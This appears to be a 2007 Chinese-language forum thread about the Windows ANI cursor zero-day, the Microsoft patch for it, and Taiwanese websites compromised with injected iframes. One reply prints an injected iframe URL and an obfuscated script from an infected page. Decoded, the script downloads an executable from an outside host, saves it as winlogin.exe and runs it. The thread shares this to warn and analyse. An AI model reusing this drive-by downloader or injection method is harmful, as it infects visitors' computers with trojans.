作者主題: [轉載]解救廣大鄉民，艾克索夫推出ani 0-day advisory (935423)緊急修補程式 (閱讀 14692 次)

梁楓 · « 於: 2007-04-02 10:56 »

梁楓真心推薦

http://x-solve.com/blog/?p=124

日京三子 · « **回覆 #1 於:** 2007-04-03 08:23 »

補一下，「或許」比較好.........

-----
今天早上，我公司的 Mail server 老大說話了

代碼: [選擇]

Possible buffer overflow in Windows (sword_0002.cur)歡樂的世界 o_O

netman · « **回覆 #2 於:** 2007-04-03 08:55 »

還好我用 linux ！ ^_^

hoyo · « **回覆 #3 於:** 2007-04-03 09:24 »

安裝完成，靜觀其『變』...

日京三子 · « **回覆 #4 於:** 2007-04-03 11:20 »

AVAST防毒軟體跳出來的警告：

成功攔截時的訊息：

安裝了那個緊急修補套件之後，如果你的防毒軟體沒攔截到，「真心推薦」的會出現這樣的訊息：

真是感謝「真心推薦」，真是救萬民於水火啊！

http://x-solve.com/blog/?p=124

hoyo · « **回覆 #5 於:** 2007-04-03 11:25 »

www.nikon.com.tw 這個案例消失了，三子可以提供另外一個嗎？

aloysius · « **回覆 #6 於:** 2007-04-03 11:34 »

其實真的感謝jesse大大第一時間通知這個Patch,小弟我也做了簡單的報告給上面的長官，但是最後的建議是：不建議安裝。列入觀察...

有以下幾點原因：

1.公司PC/SERVER數量稍多

2.怕影響24hr作業的機器造成產線停擺

3.如果是已知的威脅(病毒/蟲/後門)防毒軟體至少可以偵測到

4.如果是未知的威脅，我看也等到歡樂時光才會發現! XD

因應作為就是提高公司防毒軟體更新病毒碼的頻率，並且隨時注意各類災情! 完畢..

梁楓 · « **回覆 #7 於:** 2007-04-03 11:34 »

這種案例不會一直留著啦
基本上大部份的站三天之內應該都會發現吧
如果沒發現...那就....那就...

日京三子 · « **回覆 #8 於:** 2007-04-03 11:48 »

引述: "hoyo"

www.nikon.com.tw 這個案例消失了，三子可以提供另外一個嗎？

消失？

請用IE瀏覽器觀看.... 如果看過一次，記得清除cookie 再來一次.....

hoyo · « **回覆 #9 於:** 2007-04-03 12:26 »

引述: "日京三子"

引述: "hoyo"
www.nikon.com.tw 這個案例消失了，三子可以提供另外一個嗎？
消失？

請用IE瀏覽器觀看.... 如果看過一次，記得清除cookie 再來一次.....

代碼: [選擇]

</table>  <iframe src= width=100 height=0 frameborder=0>


<!--msnavigation--></td></tr><!--msnavigation--></table><!--msnavigation--><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td>

<h5>　　Copyright(C) 2005 榮泰貿易股份有限公司<br>
　　上次修改日期： 2006年08月09日
</h5>

</td></tr><!--msnavigation--></table></body>
</html>

iframe 內的網址消失了，所以病毒也消失了

日京三子 · « **回覆 #10 於:** 2007-04-03 12:31 »

喔喔∼∼

想必，是諸多網友去反應，終於有結果。改天發現時再來玩^^

日京三子 · « **回覆 #11 於:** 2007-04-04 08:23 »

微軟推出漏洞修補程式：

http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspx

代碼: [選擇]


Microsoft Security Bulletin MS07-017
Vulnerabilities in GDI Could Allow Remote Code Execution (925902)
Published: April 3, 2007

Security Update Replacement: This bulletin replaces aprior security update. See the Frequently Asked Questions (FAQ) section of this bulletin for details.

Caveats: Microsoft Knowledge Base Article 925902 documents the currently known issues that customers may experience when they install this security update. The article also documents recommended solutions for these issues. For more information, see Microsoft Knowledge Base Article 925902

threeseconds · « **回覆 #12 於:** 2007-04-04 10:08 »

今天早上看到更新檔出來了，KB925902
http://www.microsoft.com/technet/security/bulletin/ms07-017.mspx
大家快安裝更新吧。

hoyo · « **回覆 #13 於:** 2007-04-04 12:47 »

裝完微軟更新檔重新開機之後我的 TUGZip 掛了 (參考案例)

micmic3 · « **回覆 #14 於:** 2007-04-04 16:34 »

新聞出來了
http://tw.news.yahoo.com/article/url/d/a/070403/17/ce83.html
目前已知包括台灣Nikon、大興旅行社、台灣豐田汽車 (Toyota) 、司法院網站、旅遊書籤...等網站已受害
:lol: 大家可以再找找

Tim · « **回覆 #15 於:** 2007-04-07 02:23 »

引述: "threeseconds"

今天早上看到更新檔出來了，KB925902
http://www.microsoft.com/technet/security/bulletin/ms07-017.mspx

檔案抓回來一看，日期是 2007/3/8。
微軟也真是的，拖到2007/4/3才發布更新。

湯姆貓 · « **回覆 #16 於:** 2007-04-07 12:26 »

等到大家爆了,
它跑出來救火,
這樣才代表它有在做事嘛~~~

日京三子 · « **回覆 #17 於:** 2007-04-14 09:32 »

引述: "hoyo"

iframe 內的網址消失了，所以病毒也消失了

新發現：

http://www.wanluan-lins.com.tw/inside.html

在：

http://www.wanluan-lins.com.tw/inside.asp

裡面，被植入：

代碼: [選擇]

<iframe src="http://che.cycu.edu.tw/mphl/B76504~/comm/UpLoad//home//images2/showtime/jpg.htm" width="0" height="0" frameborder="0"></iframe>

裡面所引導的程式碼，如下：

代碼: [選擇]

<!--
var HtmlStrings=["=iunm^B>^N^K!=tdsjqu!mbohvbhf>#WCTdsjqu#^B>^N^K!!!!po!fssps!sftvnf!ofy","u^N^K!!!!em!>!#iuuq;00dif/dzdv/fev/ux0nqim0C87615^?0dpnn0VqMpbe0","0ipnf00jnbhft30tipxujnf0kqh/fyf#^N^K!!!!Tfu!eg!>!epdvnfou/dsfbu","fFmfnfou)#pckfdu#*^N^K!!!!eg/tfuBuusjcvuf!#dmbttje#-!#dmtje;CE:","7D667.76B4.22E1.:94B.11D15GD3:F47#^N^K!!!!tus>#Njdsptpgu/YNMIUU","Q#^N^K!!!!Tfu!y!>!eg/DsfbufPckfdu)tus-##*^N^K!!!!b2>#Bep#^N^K!!!!b3",">#ec/#^N^K!!!!b4>#Tus#^N^K!!!!b5>#fbn#^N^K!!!!tus2>b2'b3'b4'b5^N^K!!!","!tus6>tus2^N^K!!!!tfu!T!>!eg/dsfbufpckfdu)tus6-##*^N^K!!!!T/uzqf!",">!2^N^K!!!!tus7>#HFU#^N^K!!!!y/Pqfo!tus7-!em-!Gbmtf^N^K!!!!y/Tfoe^N^K","!!!!gobnf2>#xjomphjo/fyf#^N^K!!!!tfu!G!>!eg/dsfbufpckfdu)#Tdsjq","ujoh/GjmfTztufnPckfdu#-##*^N^K!!!!tfu!unq!>!G/HfuTqfdjbmGpmefs)","3*!^N^K!!!!gobnf2>!G/CvjmeQbui)unq-gobnf2*^N^K!!!!T/pqfo^N^K!!!!T/x","sjuf!y/sftqpotfCpez^N^K!!!!T/tbwfupgjmf!gobnf2-3^N^K!!!!T/dmptf^N^K","!!!!tfu!R!>!eg/dsfbufpckfdu)#Tifmm/Bqqmjdbujpo#-##*^N^K!!!!R/Ti","fmmFyfdvuf!gobnf2-##-##-#pqfo#-1^N^K!!!!=0tdsjqu^B>^N^K!!!!=ifbe^B>","^N^K!!!!=ujumf^B>^B新^B世@^B网^B安埻^B地=0ujumf^B>^N^K!!!!=0ifbe^B>=cpez^B>^N^K^B =dfoufs^B>iuuq;00xxx/631ibdl/dpn0卡朊耆刷佝-@^B系RR;9449961/=","0dfoufs^B>^N^K!!!!=0cpez^B>=0iunm^B>^N^K"];
function psw(st){
  var varS;
  varS="";
  var i;
  for(var a=0;a<st.length;a++){
    i = st.charCodeAt(a);
    if (i==1)
      varS=varS+String.fromCharCode('"'.charCodeAt()-1);
    else if (i==2) {
      a++;
      varS+=String.fromCharCode(st.charCodeAt(a));
      }
    else
      varS+=String.fromCharCode(i-1);
  }
  return varS;
};

接著，你的電腦就中木馬了.........

非常標準的SQL指令植入式攻擊(SQL IMeaion) SQL Injection 的手法，報告完畢。
---
FireFox 基本上不會有反應（1.x 與 2.x，官方中文，for windows 版本），只有 IE 6 與 IE 7 會有木馬反應。

酷!學園

最新消息: